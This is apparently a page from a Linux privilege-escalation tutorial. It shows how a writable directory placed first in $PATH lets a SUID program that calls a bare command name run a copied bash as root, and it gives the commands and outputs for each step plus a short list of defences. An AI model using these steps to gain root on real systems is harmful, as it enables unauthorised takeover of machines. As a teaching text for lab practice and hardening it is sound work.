PATH

This section demonstrates how to exploit misconfigurations in the $PATH environment variable to escalate privileges by hijacking executable lookups. This method relies on writable directories in $PATH and improperly secured scripts.

$PATH is an environment variable in Linux. It tells the system where to look for programs when you run a command.
For example, if you run ls, the system looks for ls in the directories listed in $PATH.

To see your current $PATH, run:

echo $PATH

Example Output:

/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin

Exploiting `$PATH` in 5 Simple Steps

We’ll create a situation where we trick the system into running a malicious program by taking advantage of a writable folder in $PATH.

Step 1: Check for Writable Directories

Find directories where your user can write:

find / -writable 2>/dev/null

Example Output:

/tmp
/home/yourusername

If any of these writable directories are in $PATH, we can exploit them. If not, we'll add one (see Step 4).

Step 2: Check for Vulnerable Programs

Some programs or scripts might call other programs without using their full path. For example:

#include <stdlib.h>

int main() {
    system("example-command");
    return 0;
}

When this program runs, it looks for example-command in the directories listed in $PATH. If we create a malicious example-command, the program will run it instead of the intended one.

Step 3: Compile the Vulnerable Program

Compile the program:

gcc -o vulnerable vulnerable.c

Set the SUID bit to allow it to run with elevated privileges:

sudo chmod u+s vulnerable

Verify the permissions:

ls -l vulnerable

Output:

-rwsr-xr-x 1 root root 16768 Jan 11 15:42 vulnerable

Step 4: Add a Writable Directory to `$PATH`

If a writable directory (like /tmp) is not in $PATH, add it:

export PATH=/tmp:$PATH

Check the updated $PATH:

echo $PATH

Output:

/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin

Step 5: Create the Malicious Program

Create a fake program called example-command in /tmp. This program will run instead of the real one.

Copy /bin/bash (a shell) and rename it:

cp /bin/bash /tmp/example-command
chmod +x /tmp/example-command

Verify:

ls -l /tmp/example-command

Output:

-rwxr-xr-x 1 username username 1183448 Dec 23 15:43 /tmp/example-command

Step 6: Execute the Vulnerable Program

Run the vulnerable program:

./vulnerable

If successful, you’ll get a root shell:

# whoami
root

Why Does This Work?

The vulnerable program runs example-command from $PATH.
$PATH includes /tmp (or another writable directory you added).
The program runs our malicious /tmp/example-command instead of the real one, and it inherits root privileges because of the SUID bit.

How to Defend Against This?

Avoid writable directories in $PATH.
Use absolute paths in scripts and programs (e.g., /usr/bin/ls instead of ls).
Remove unnecessary SUID bits on programs.

Key Commands Recap:

View $PATH:
```
bashCopy codeecho $PATH
```

Find writable directories:

bashCopy codefind / -writable 2>/dev/null

Add /tmp to $PATH:
```
bashCopy codeexport PATH=/tmp:$PATH
```

Create malicious program:

bashCopy codecp /bin/bash /tmp/example-command
chmod +x /tmp/example-command

Run the vulnerable program:
```
bashCopy code./vulnerable
```

PreviousCron jobs NextNFS

Last updated 1 year ago

hashtagExploiting $PATH in 5 Simple Steps

hashtagStep 1: Check for Writable Directories

hashtagStep 2: Check for Vulnerable Programs

hashtagStep 3: Compile the Vulnerable Program

hashtagStep 4: Add a Writable Directory to $PATH

hashtagStep 5: Create the Malicious Program

hashtagStep 6: Execute the Vulnerable Program

hashtagWhy Does This Work?

hashtagHow to Defend Against This?

hashtagKey Commands Recap:

Exploiting `$PATH` in 5 Simple Steps

Step 1: Check for Writable Directories

Step 2: Check for Vulnerable Programs

Step 3: Compile the Vulnerable Program

Step 4: Add a Writable Directory to `$PATH`

Step 5: Create the Malicious Program

Step 6: Execute the Vulnerable Program

Why Does This Work?

How to Defend Against This?

Key Commands Recap: